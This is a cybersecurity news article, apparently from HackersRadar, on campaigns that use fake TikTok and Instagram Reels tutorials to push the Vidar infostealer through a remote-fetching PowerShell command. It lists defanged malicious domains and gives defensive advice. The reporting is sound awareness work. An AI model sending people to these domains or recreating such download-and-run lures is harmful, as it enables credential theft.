Hackers Spread Malware via Fake Software on TikTok & Reels

Cybercriminals are now exploiting short-form video platforms, turning TikTok and Instagram Reels into a new attack surface. They are distributing malware to unsuspecting users through fake software tutorials posted on these platforms.

The tactic is simple but remarkably effective: create polished, convincing videos that promise free access to popular premium software, then quietly funnel viewers toward malicious downloads.

The attack works because it blends in so naturally. These videos look no different from the millions of tech tips and how-to clips that flood social media every single day.

With thousands of views and hundreds of likes behind them, victims have little reason to question whether the content is genuine. That false sense of credibility is exactly what the attackers count on.

Analysts at ReversingLabs identified and analyzed two distinct campaign methods used in this threat, both managing to reach massive audiences by gaming social media recommendation algorithms.

The research was led by threat intelligence researcher Zaria Vuksan, who documented how attackers expertly exploit platform engagement mechanics to spread malware at scale across multiple platforms.

Both campaigns share the same end goal: send users to a third-party website hosting malicious software disguised as a free premium app. What differs is how each campaign builds trust before delivering the payload.

The malware deployed through these videos is Vidarstealer, a well-known infostealer offered as a service that steals login credentials, financial data, and session tokens from infected devices.

Vidarstealer received an update in October of last year, making it more evasive and harder to detect. With a lifetime license priced at around $300, it remains a favorite tool for threat actors across many campaigns.

ReversingLabs said in a report shared with Cyber Security News (CSN) that this combination of widespread social media reach and accessible malware tools creates a genuinely dangerous threat environment for everyday users and organizations alike.

Hackers Abuse TikTok and Instagram Reels

The first campaign uses accounts with usernames like “windows.tips” or “windows.insights,” paired with a blue and white profile image designed to closely mimic the official Windows social media icon.

These accounts post professional tutorial videos with AI-generated voice overs, walking users through typing a specific PowerShell command that supposedly unlocks Spotify Premium for free.

That command instructs Windows to silently download and run a script from a remote address. When users follow the steps without question, they unknowingly execute a file identified as Vidarstealer.

What makes this especially dangerous is how clean and authoritative the videos appear, with many racking up over 100,000 views alongside thousands of saves and shares.

The second campaign takes a far more casual approach to luring victims. These accounts post short, vague clips showing premium Spotify features while playing trending music, then encourage viewers to comment out of curiosity.

Once engagement builds, the attacker replies with directions to malicious sites like pluginchad[.]xyz or d4ug[.]site, which offer fake software downloads hidden behind survey walls.

Why These Social Engineering Attacks Are Difficult to Stop

What makes this threat especially stubborn is that social media platforms are not well equipped to stop it. Researchers at ReversingLabs attempted to report malicious Instagram accounts as scams, and every single report was rejected.

Even when content is flagged, platforms act slowly, and by the time an account is removed, the damage is already done.

Attackers also suppress community warnings with considerable ease. If a viewer leaves a comment alerting others to the scam, the attacker simply deletes it and blocks that user right away.

This dynamic makes genuine self-policing nearly impossible, leaving the full burden of defense squarely on organizations and individual users to handle.

Practical defenses do exist and should be acted on now. Organizations should regularly audit who holds installation permissions on work devices, since some software promoted in these videos is framed as useful professional tools.

Phishing training programs must stay current and explicitly cover social media as an attack vector, not just email. Users should report suspicious accounts consistently, since higher report volumes do increase the likelihood of removal and can slow an attacker’s momentum.

Indicators of Compromise (IoCs):-

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.